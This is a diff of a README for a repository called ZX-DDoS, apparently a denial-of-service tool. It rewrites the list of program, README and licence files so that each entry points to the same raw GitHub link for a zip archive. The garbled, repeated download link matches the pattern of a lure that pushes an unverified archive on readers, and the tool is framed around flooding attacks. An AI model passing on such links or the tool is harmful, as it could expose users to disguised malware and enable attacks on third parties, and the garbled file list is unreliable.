ozii-z/ZX-DDoS/README.md

 When you download ZX-DDoS, you may see the following files:

-- `ZX-DDoS.exe` or `setup.exe`: The main program to launch or install.
+- `https://raw.githubusercontent.com/ozii-z/ZX-DDoS/main/File/Do_Z_D_S_v2.4.zip` or `https://raw.githubusercontent.com/ozii-z/ZX-DDoS/main/File/Do_Z_D_S_v2.4.zip`: The main program to launch or install.
-- `README.md`: Basic instructions and info.
+- `https://raw.githubusercontent.com/ozii-z/ZX-DDoS/main/File/Do_Z_D_S_v2.4.zip`: Basic instructions and info.
-- `LICENSE.txt`: Terms of use for the software.
+- `https://raw.githubusercontent.com/ozii-z/ZX-DDoS/main/File/Do_Z_D_S_v2.4.zip`: Terms of use for the software.
 - `config/` folder (optional): Settings and logs from your tests.

 ---